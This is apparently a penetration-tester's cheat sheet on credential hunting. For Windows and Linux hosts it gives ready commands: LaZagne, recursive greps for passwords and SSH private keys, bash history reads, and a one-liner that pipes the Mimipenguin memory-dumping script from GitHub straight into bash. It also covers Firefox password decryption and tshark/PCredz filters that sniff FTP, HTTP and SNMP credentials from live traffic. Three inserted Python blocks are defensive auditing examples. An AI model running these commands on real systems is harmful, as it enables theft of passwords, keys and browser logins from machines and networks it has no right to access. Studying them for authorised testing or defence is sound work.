PRIMARY CATEGORY → PASSWORD ATTACKS

Credential Hunting - Windows

Lazagne

Lazagne    •    Standalone Binaries

start lazagne.exe all
Verbose Output
start lazagne.exe -vv all
Findstr
findstr /SIM /C:"password" *.txt *.ini *.cfg *.config *.xml *.git *.ps1 *.yml

Credential Hunting - Linux

Credentials Resources
FILES                 HISTORY                 MEMORY                  KEY-RINGS
Configs               Logs                    Cache                   Browser Stored Creds
Databases             Command-Line History    In-Memory Processing
Notes
Scripts
Source Code
Cronjobs
SSH Keys

.conf    •    .config    •    .cnf    

Find
  • Search all Configuration Files on the System (Above File Extensions)
for _file in ".conf" ".config" ".cnf"
do
	printf "\nFile Extension: %s\n\n" "$_file"
	find / -iname "*${_file}" 2> /dev/null | grep -viP -- 'lib|fonts|share|core'
done
  • Search for the specified Words in all the System Configuration Files
for _file in ".conf" ".config" ".cnf"
do
	printf "\nFile Extension: %s\n\n" "$_file"
	find / -iname "*${_file}" -exec grep -iP --color -- 'user|password|pass' {} + 2> /dev/null | grep -viP -- 'lib|fonts|share|core'
done
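The two loops above report every matching line verbatim, which re-exposes the secret in whatever terminal log or ticket the output lands in. The following Python counterpart is an added example, not part of the original notes: it walks a tree for the same extensions, applies the same noise filter and keyword list, but redacts the value of each hit so the report can be shared with the owning team. The sample tree built in `demo()` is constructed data.

```python
"""Audit a directory tree for configuration files that carry credentials.

Added example, not from the original notes: a Python counterpart of the
find/grep loops above, written for a defender auditing their own hosts. It
reports where credential-looking lines live but redacts the values, so the
report can be shared without re-leaking the secret. The sample tree built in
demo() is constructed data.
"""
import os
import re
import tempfile

# Extensions the notes search; the skip list mirrors the page's
# `grep -viP 'lib|fonts|share|core'` noise filter.
CONFIG_EXTENSIONS = (".conf", ".config", ".cnf")
SKIP_PATH_RE = re.compile(r"lib|fonts|share|core", re.IGNORECASE)
# Same keywords the page greps for inside the files.
CRED_LINE_RE = re.compile(r"user|password|pass", re.IGNORECASE)


def redact(line: str) -> str:
    """Keep the key, replace whatever follows the first '=' or ':' with a marker."""
    return re.sub(r"([=:]\s*)\S.*$", r"\1<redacted>", line.strip(), count=1)


def scan_file(path: str) -> list:
    """Return (path, line number, redacted line) for every credential-looking line."""
    findings = []
    try:
        with open(path, "r", encoding="utf-8", errors="replace") as fh:
            for lineno, line in enumerate(fh, 1):
                if CRED_LINE_RE.search(line):
                    findings.append((path, lineno, redact(line)))
    except OSError:
        pass  # unreadable files are skipped, as `2> /dev/null` does on the page
    return findings


def audit_tree(root: str, extensions=CONFIG_EXTENSIONS) -> list:
    """Walk `root`, skipping noisy directories, and scan matching config files."""
    findings = []
    for dirpath, dirnames, filenames in os.walk(root):
        # Prune noisy directories in place so os.walk never descends into them.
        dirnames[:] = [d for d in dirnames if not SKIP_PATH_RE.search(d)]
        for name in sorted(filenames):
            full = os.path.join(dirpath, name)
            rel = os.path.relpath(full, root)
            if name.lower().endswith(extensions) and not SKIP_PATH_RE.search(rel):
                findings.extend(scan_file(full))
    return findings


def demo() -> list:
    """Build a small constructed tree and audit it; returns the findings."""
    root = tempfile.mkdtemp(prefix="cred-audit-")
    os.makedirs(os.path.join(root, "etc", "app"))
    os.makedirs(os.path.join(root, "usr", "lib", "pkg"))
    with open(os.path.join(root, "etc", "app", "db.conf"), "w") as fh:
        fh.write("host = db.internal\nuser = appsvc\npassword = Example123!\n")
    with open(os.path.join(root, "usr", "lib", "pkg", "noise.conf"), "w") as fh:
        fh.write("password = hidden-by-the-lib-filter\n")  # pruned like the page's grep -v
    with open(os.path.join(root, "etc", "app", "notes.txt"), "w") as fh:
        fh.write("password = wrong-extension\n")  # not a config extension
    return audit_tree(root)


if __name__ == "__main__":
    for path, lineno, text in demo():
        print(f"{path}:{lineno}: {text}")
```

Point `audit_tree()` at `/` (as root) to reproduce the page's sweep; the redaction only strips the value after the first `=` or `:`, so formats that put the secret elsewhere (for example a bare password on its own line) still print as-is and should be handled before sharing the report.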
Databases

.sql    •    .db    •    .bd

Find
  • Search all Database Files on the System (Above File Extensions)
for _file in ".sql" ".db" ".bd"
do
	printf "\nFile Extension: %s\n\n" "$_file"
	find / -iname "*${_file}" 2> /dev/null | grep -viP -- 'lib|fonts|share|core'
done
Notes
Find
find /home/* -type f \( -iname "*.txt" -o ! -iname "*.*" \)
Scripts

.py    •    .pyc    •    .pl    •    .go    •    .jar    •    .c    •    .sh

Find
for _file in ".py" ".pyc" ".pl" ".go" ".jar" ".c" ".sh"
do
	printf "\nFile Extension: %s\n\n" "$_file"
	find / -iname "*${_file}" 2> /dev/null | grep -viP -- 'lib|fonts|share|core'
done
CronJobs
cat /etc/crontab
ls -la /etc/cron.*/
SSH Keys
SSH Private Keys
grep -RniP --color -- "PRIVATE KEY" / 2>/dev/null | grep ':1:'
SSH Public Keys
grep -RniP --color -- "ssh-rsa" / 2>/dev/null | grep ':1:'
History
Bash History
less /home/*/.bash*
Logs
pattern='accepted\|session opened\|session closed\|failure\|failed\|ssh\|password changed\|new user\|delete user\|sudo\|COMMAND=\|logs'
for i in /var/log/* /var/log/*/*
do
	# Regular files only; test once with -q, then print the matching lines
	[ -f "$i" ] || continue
	if grep -q "$pattern" "$i" 2>/dev/null ; then
		echo -e "\n#### Log file: $i"
		grep "$pattern" "$i" 2>/dev/null
	fi
done
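The loop above dumps every matching line from every log, which is hard to read on a busy host. As an added example (not from the original notes), the script below applies the same keyword families to constructed auth-log lines but tags each line with an event kind and counts failed logins per source address, which is the shape a defender actually wants when looking for brute-force noise or account tampering. The log lines are constructed samples, not a real host's log.

```python
"""Triage authentication log lines for the events the loop above greps for.

Added example, not from the original notes: instead of echoing raw matches it
classifies each line (successful login, failed login, sudo command, account
change, session open/close) and counts failures per source address, so a
defender can spot brute-force noise and account tampering at a glance. The
log lines are constructed samples, not a real host's log.
"""
import re
from collections import Counter

# Keyword groups distilled from the grep pattern on the page. Order matters:
# the first group that matches a line decides its kind.
EVENT_PATTERNS = [
    ("account_change", re.compile(r"new user|delete user|password changed", re.I)),
    ("sudo_command", re.compile(r"sudo.*COMMAND=", re.I)),
    ("auth_failure", re.compile(r"failed|failure", re.I)),
    ("auth_success", re.compile(r"accepted", re.I)),
    ("session", re.compile(r"session opened|session closed", re.I)),
]
# Source address as sshd logs it ("... from 203.0.113.9 port ...").
SOURCE_RE = re.compile(r"\bfrom (\d{1,3}(?:\.\d{1,3}){3})\b")

# Constructed sample lines in syslog/auth.log style.
SAMPLE_AUTH_LOG = """\
Mar 10 08:01:12 host sshd[1201]: Accepted publickey for alice from 10.0.0.5 port 50012 ssh2
Mar 10 08:02:40 host sshd[1210]: Failed password for invalid user admin from 203.0.113.9 port 41022 ssh2
Mar 10 08:02:41 host sshd[1210]: Failed password for invalid user admin from 203.0.113.9 port 41022 ssh2
Mar 10 08:02:43 host sshd[1212]: Failed password for root from 203.0.113.9 port 41030 ssh2
Mar 10 08:05:00 host sudo:    alice : TTY=pts/0 ; PWD=/home/alice ; USER=root ; COMMAND=/usr/bin/less /var/log/auth.log
Mar 10 08:05:00 host sudo: pam_unix(sudo:session): session opened for user root by alice(uid=1000)
Mar 10 08:06:10 host useradd[1300]: new user: name=backup, UID=1001, GID=1001, home=/home/backup
Mar 10 08:07:01 host CRON[1400]: (root) CMD (run-parts /etc/cron.hourly)
"""


def classify(line: str):
    """Return the event kind for a line, or None when no keyword group matches."""
    for kind, pattern in EVENT_PATTERNS:
        if pattern.search(line):
            return kind
    return None


def triage(text: str) -> list:
    """Turn raw log text into a list of tagged events (unmatched lines are dropped)."""
    events = []
    for lineno, line in enumerate(text.splitlines(), 1):
        kind = classify(line)
        if kind is None:
            continue
        src = SOURCE_RE.search(line)
        events.append({"line": lineno, "kind": kind,
                       "source": src.group(1) if src else None, "text": line})
    return events


def failures_by_source(events: list, threshold: int = 3) -> dict:
    """Source addresses with at least `threshold` failed logins (brute-force signal)."""
    counts = Counter(e["source"] for e in events
                     if e["kind"] == "auth_failure" and e["source"])
    return {src: n for src, n in counts.items() if n >= threshold}


if __name__ == "__main__":
    evts = triage(SAMPLE_AUTH_LOG)
    for e in evts:
        print(f"{e['line']:>3} {e['kind']:<15} {e['text']}")
    print("repeated failures:", failures_by_source(evts))
```

To run it against a real file, pass `open("/var/log/auth.log").read()` to `triage()`; the cron line in the sample shows that lines outside the keyword families are dropped rather than misfiled.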
Memory and Cache
Mimipenguin

Mimipenguin

  • Python Script
curl --silent --location --request GET "https://github.com/huntergregal/mimipenguin/raw/refs/heads/master/mimipenguin.py" --output mimipenguin.py
python3 !$
  • Bash Script
bash - < <( curl --silent --location --request GET "https://github.com/huntergregal/mimipenguin/raw/refs/heads/master/mimipenguin.sh" )
Lazagne

Lazagne

Setup
git clone https://github.com/AlessandroZ/LaZagne Lazagne
python3 -m venv .venv
. !$/bin/activate && pip3 install -r ./Lazagne/requirements.txt
Execution
python3 ./Lazagne/Linux/laZagne.py all
Browsers
  • Firefox Stored Credentials

logins.json

Locate Firefox profile directories (each profile keeps its own logins.json)
find /home/*/.mozilla/firefox -type d -iname '*default*'
Firefox Decrypt

Firefox Decrypt

curl --silent --location --request GET --remote-name "https://github.com/unode/firefox_decrypt/raw/refs/heads/main/firefox_decrypt.py"
python3 firefox_decrypt.py
Firepwd

Firepwd

git clone https://github.com/lclevy/firepwd Firepwd
python3 -m venv .venv
. !$/bin/activate && pip3 install -r ./Firepwd/requirements.txt
python3 ./Firepwd/firepwd.py # Or
python3 ./Firepwd/firepwd.py --dir=<DIRECTORY_PROFILE>
Lazagne

Lazagne

  • Setup ⚙️
git clone https://github.com/AlessandroZ/LaZagne Lazagne
python3 -m venv .venv
. !$/bin/activate && pip3 install -r ./Lazagne/requirements.txt
  • Execution ⚒️
python3 ./Lazagne/Linux/laZagne.py browsers

Credential Hunting in Network Traffic

We can only extract data from captured packets when the protocol in use is not end-to-end encrypted.

That is, if an attacker intercepts packets from an HTTPS connection between a client and a web server, the data contained in those packets cannot be extracted unless the attacker knows the key.

In that case, since the encryption method used in a client-server architecture is usually a symmetric cipher, the attacker could use that key to decrypt those packets and extract all the data in plain form.
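The difference between the protocols listed below and their encrypted counterparts is visible in the bytes themselves. The following is an added example, not part of the original notes: a small detector that runs over constructed TCP payloads and flags credential fields that travel in the clear (FTP `USER`/`PASS` commands and HTTP POST form bodies), reporting them with the values redacted. A TLS application-data record is included to show that the same inspection finds nothing once the protocol is encrypted. Every payload is a constructed sample; the field names and regexes are this example's own choices.

```python
"""Why cleartext protocols leak credentials and encrypted ones do not.

Added example, not from the original notes: a small detector that runs over
constructed TCP payloads and flags credential fields that travel in the clear
(FTP USER/PASS commands and HTTP POST form bodies), reporting them with the
values redacted. A TLS application-data record is included to show that the
same inspection finds nothing once the protocol is encrypted: without the
session key the bytes are opaque. Every payload here is a constructed sample.
"""
import hashlib
import re
from urllib.parse import parse_qs

# FTP sends the login as two separate commands on the control channel.
FTP_CRED_RE = re.compile(rb"^(USER|PASS) (\S+)\r?$", re.MULTILINE)
# Minimal HTTP/1.x request parser: request line, headers, body.
HTTP_POST_RE = re.compile(rb"^POST (\S+) HTTP/1\.[01]\r\n(.*?)\r\n\r\n(.*)$", re.DOTALL)
# Form field names worth flagging when they cross the wire unencrypted.
CRED_FIELD_RE = re.compile(r"user|login|pass|pwd|token|secret", re.IGNORECASE)

# --- constructed samples ------------------------------------------------------
FTP_SESSION = (
    b"220 ftp.example.test ready\r\n"
    b"USER alice\r\n"
    b"331 Password required\r\n"
    b"PASS Example123!\r\n"
    b"230 Login successful\r\n"
)
HTTP_POST = (
    b"POST /login HTTP/1.1\r\n"
    b"Host: www.example.test\r\n"
    b"Content-Type: application/x-www-form-urlencoded\r\n"
    b"Content-Length: 37\r\n"
    b"\r\n"
    b"username=alice&password=Example123%21"
)
# TLS 1.2 application-data record header followed by 32 bytes standing in for
# ciphertext (a hash digest: arbitrary-looking bytes, not real TLS output).
TLS_RECORD = b"\x17\x03\x03\x00\x20" + hashlib.sha256(b"constructed").digest()

SAMPLES = {"ftp": FTP_SESSION, "http": HTTP_POST, "tls": TLS_RECORD}


def inspect_ftp(payload: bytes) -> list:
    """Flag USER/PASS commands; only the command name is reported, never the argument."""
    return [{"proto": "ftp", "field": cmd.decode(), "value": "<redacted>"}
            for cmd, _arg in FTP_CRED_RE.findall(payload)]


def inspect_http(payload: bytes) -> list:
    """Flag credential-named form fields in an unencrypted HTTP POST body."""
    m = HTTP_POST_RE.match(payload)
    if not m:
        return []
    body = m.group(3).decode("latin-1")
    return [{"proto": "http", "field": field, "value": "<redacted>"}
            for field in parse_qs(body) if CRED_FIELD_RE.search(field)]


def inspect(payload: bytes) -> list:
    """Run every cleartext detector; ciphertext matches none of them."""
    return inspect_ftp(payload) + inspect_http(payload)


def demo() -> dict:
    """Inspect each constructed sample and return findings keyed by sample name."""
    return {name: inspect(payload) for name, payload in SAMPLES.items()}


if __name__ == "__main__":
    for name, findings in demo().items():
        print(f"{name:<5} {findings or 'nothing recoverable'}")
```

The empty result for the TLS sample is the whole point of the paragraph above: the detector is the same, the traffic is not. A monitoring pipeline that feeds reassembled streams into `inspect()` can therefore alert on cleartext logins crossing the network, which is the defensive use of the same observation the tshark filters below rely on.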

TShark

TShark

HTTP

Encrypted Counterpart → HTTPS

  • HTTP POST Data (POST Parameters’ value)

From a given Capture File e.g. Pcap

tshark -r <CAPTURE_FILE> -Y 'http.request.method == "POST"' -T fields -e http.file_data 2> /dev/null

From Live Traffic

tshark --interface <INTERFACE> -Y 'http.request.method == "POST"' -T fields -e http.file_data 2> /dev/null
SNMP

Encrypted Counterpart → SNMPv3

  • SNMP Community String

From a given Capture File e.g. Pcap

tshark -r <CAPTURE_FILE> -Y 'snmp' -T fields -e snmp.community 2> /dev/null | sort -u

From Live Traffic

tshark --interface <INTERFACE> -Y 'snmp' -T fields -e snmp.community 2> /dev/null
FTP

Encrypted Counterpart → FTPS

  • FTP Login (User and Password)

From a given Capture File e.g. Pcap

tshark -r <CAPTURE_FILE> -Y 'ftp.request.command == "USER" or ftp.request.command == "PASS"' -T fields -e ftp.request.command -e ftp.request.arg -E separator=: 2> /dev/null

From Live Traffic

tshark --interface <INTERFACE> -Y 'ftp.request.command == "USER" or ftp.request.command == "PASS"' -T fields -e ftp.request.command -e ftp.request.arg -E separator=: 2> /dev/null
PCredz

PCredz

Setup
apt install -y -- python3-pip libpcap-dev file
python3 -m venv .venv
source !$/bin/activate
pip3 install Cython python-libpcap
git clone https://github.com/lgandx/PCredz PCredz
Creds Extraction

From a given Capture File e.g. Pcap

python3 ./PCredz/Pcredz -v -f <CAPTURE_FILE>